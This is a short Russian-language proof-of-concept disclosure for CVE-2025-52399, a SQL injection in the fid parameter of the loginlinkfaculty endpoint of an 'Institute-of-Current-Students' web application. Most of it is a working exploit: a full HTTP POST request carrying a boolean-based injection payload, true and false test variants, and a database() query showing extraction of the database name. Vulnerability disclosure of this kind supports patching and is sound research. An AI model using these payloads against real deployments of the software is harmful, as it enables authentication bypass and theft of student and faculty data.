
Эксплойт Proof-of-Concept для CVE-2025-52399, демонстрирующий SQL-инъекцию в конечной точке loginlinkfaculty Institute-of-Current-Students, обеспечивающую обход аутентификации и извлечение данных.
Конечная точка loginlinkfaculty в приложении Institute-of-Current-Students уязвима для SQL-инъекции через POST-параметр fid. Параметр не проходит должную санитизацию перед использованием в SQL-запросе, что позволяет удалённым злоумышленникам выполнять произвольные SQL-команды.
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → ИСТИНА
❌ -1' OR 2*3=4 AND 000942=000942 -- → ЛОЖЬ
SELECT database(); -- возвращает 'icsnew'
Isroil Mustafoqulov